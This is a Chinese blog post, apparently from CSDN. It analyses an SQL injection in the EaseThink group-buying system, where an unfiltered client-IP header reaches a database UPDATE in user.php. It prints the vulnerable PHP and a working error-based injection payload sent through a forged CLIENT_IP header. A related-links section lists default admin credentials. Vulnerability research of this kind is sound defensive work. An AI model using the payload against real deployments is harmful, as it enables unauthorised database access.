易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用

最新推荐文章于 2021-08-06 10:51:09 发布
最新推荐文章于 2021-08-06 10:51:09 发布
阅读量218 收藏
点赞数
文章标签: 易想团购 注入 user.php

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。

找到get_client_ip()函数:

// 获取客户端IP地址

function get_client_ip(){

if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))

$ip = getenv("HTTP_CLIENT_IP");

else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))

$ip = getenv("HTTP_X_FORWARDED_FOR");

else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))

$ip = getenv("REMOTE_ADDR");

else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))

$ip = $_SERVER['REMOTE_ADDR'];

else

$ip = "unknown";

return($ip);

}

果然没过滤,看了下很多地方用到这个函数。

比如:

if($_REQUEST['act'] == 'verify')

{

$id = intval($_REQUEST['id']);

$user_info = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."user where id = ".$id);

if(!$user_info)

{

showErr($GLOBALS['lang']['NO_THIS_USER']);

}

$verify = $_REQUEST['code'];

if($user_info['verify'] == $verify)

{

//成功

$_SESSION['user_info'] = $user_info;

$GLOBALS['db']->query("update ".DB_PREFIX."user set login_ip = '".get_client_ip()."',login_time= ".get_gmtime().",verify = '',is_effect = 1 where id =".$user_info['id']);

$GLOBALS['db']->query("update ".DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$user_info['email']."'");

$GLOBALS['db']->query("update ".DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$user_info['mobile']."'");

showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/");

}

团购系统嘛,其实不用看代码,登陆的这些地方必定会用这个函数。

果断的,登陆的时候在http头里面加了个client_ip,值为127′

看图:

f590df0b94732840273d3ae534367176.png

报错注入,很简单吧,

exp:

火狐插件增加client_ip头部,对应值为

‘ and (select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b)#

a727ab671c6490c29adc241f2625a022.png

这套程序用的thinkphp的框架,回头看看有没有代码执行。

感谢Seay投递

某不知名书店店长
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
易想团购系统 1.4.rar
05-24
易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。 易想团购系统 1.4 更新内容: 1.修正服务器不支持json时的json兼容函数 2.修正团购预告列表,时间显示为团购开始时间 3.修改购买时可先添加购物车,结算时登录 4.修正分享到XXX IE6乱码的问题 5.支付响应以及队列发送的BUG 安装说明: 1.安装环境需求:IIS/Apache PHP5 MySQL4/5  2.初次安装程序,将程序上传至web服务器,根据安装界面的示完成系统的安装。 3.安装成功后可删除 install 目录, 后台管理的文件为 admin.php, 如果担心后台地址的泄漏,可直接将该文件改名,同时访问改名后的文件 4.后台默认管理员的帐户为: admin 密码: admin 5.前台的演示用户帐户为: easethink 密码: easethink 6.如要使用伪静态,可在后台开启伪静态功能,需要服务器对rewriter的支持
易想团购 注入 user.php,易想(easethink)团购系统ajax文件导致SQL注入漏洞
weixin_35713824的博客
04-10 345
发布时间:2013-04-18 关键词:easethink易想团购 ajaxsql注入易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。在注册界面,输入用户名后台会验证用户名是否存在,这里是通过ajax去验证,目前很多程序都会忽略这里的过滤而导致SQL注入。system\libs\user...
ajax漏洞 sql注入,易想团购ajax.php SQL注入分析和Exp漏洞预警 -电脑资料
weixin_29696999的博客
08-06 452
在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php,* 验证会员数据 */ function check_user($field_name,$field_data) { //开始数据验证 $user_data[$field_name] = $field_data; $res = array('status'=>1,'info'=>'',...
易想团购系统通杀SQL注入漏洞分析利用
代码析构师的专栏
05-12 737
刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数: // 获取客户端IP地址 function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTT
易想团购源码
01-04
易想团购源码
易想(PHP)团购系统 v1.0.rar
07-09
易想团购系统商业版v1.0 主要功能列表 1. 团购分类:可为团购分类设置从属关联 2. 供应商帐户管理:可为每个供应商设置多个子帐户,用于确认团购券的操作,系统会自动记录xx团购券由xx商户的xx管理员进行操作。 3. ...
免费版易想团购系统
05-24
免费版易想团购系统,直接安装。PHP+MYSQL环境系统。很好用。自带支付接口
易想会员管理营销系统源代码
03-18
易想会员管理营销系统是我司历时两年打造一款B/S结构商业会员系统,技术架构为PHP+MYSQL,系统功能涵盖了会员线上线下一体化、线上电子商务、门店、会员卡、线上线下充值、消费、积分、优惠券等功能,专门为商家或...
易想团购系统1.2版最新版
05-20
最新版易想团购系统1.2版 下载安装后就可以使用
最新易想团购系统通杀SQL注入漏洞分析利用exp
收集盒 Book box
04-20 960
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数。 // 获取客户端IP地址 function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTT
易想团购 注入 user.php,易想购物(easethink)存在sql注入漏洞,附利用测试POC
weixin_34556619的博客
04-10 123
漏洞概要缺陷编号:WooYun-2013-022023漏洞标题:易想购物(easethink)存在sql注入漏洞,附利用测试POC相关厂商:易想购物漏洞作者:lxsec提交时间:2013-04-17 15:06公开时间:2013-07-16 15:06漏洞类型:SQL注射漏洞危害等级:中自评Rank:10漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2013-04-17: ...
易想团购 注入 user.php,最新易想团购系统通杀SQL注入漏洞分析利用exp
weixin_42365898的博客
04-10 131
作者:Seay刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。找到get_client_ip()函数。// 获取客户端IP地址function get_client_ip(){if (getenv("HTTP_CLIENT_IP") && strcasecmp(geten...
易想团购 注入 user.php,PHPCMS 2008 c.php存在referer sql注入及修复方案
weixin_34729012的博客
04-10 252
require './ads/include/common.inc.php';require 'f.php'; //此处为我加入的 防止 referer 攻击的代码,再下面 会介绍 f.php$id = intval($id);$ads = $c_ads->get_info($id);if($ads){$db->query("UPDATE ".DB_PRE."ads SET `cl...
易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析利用漏洞预警 -电脑资料...
weixin_28918553的博客
04-10 93
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序,找到get_client_ip()函数。// 获取客户端IP地址function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("H...
易想团购 注入 user.php,易想团购ajax.php SQL注入分析和Exp
weixin_33245735的博客
04-10 185
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php。很多程序多会忽略这个导致存在SQL注入。* 验证会员数据*/function check_user($field_name,$field_data){//开始数据验证$user_dat...
基于matlab实现的相移光纤光栅(FBG.rar
05-04
基于matlab实现的相移光纤光栅(FBG.rar
nfcPro-2020071702 id、ic读卡器软件
05-04
配套设备仪器用
数据更新至2020年分地区电源项目 建设本年施工规模.xls
最新发布
05-05
数据来源:中国电力统计NJ-2021版
基于matlab实现烟花寻优算法,自己编的.rar
05-04
基于matlab实现烟花寻优算法,自己编的.rar

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值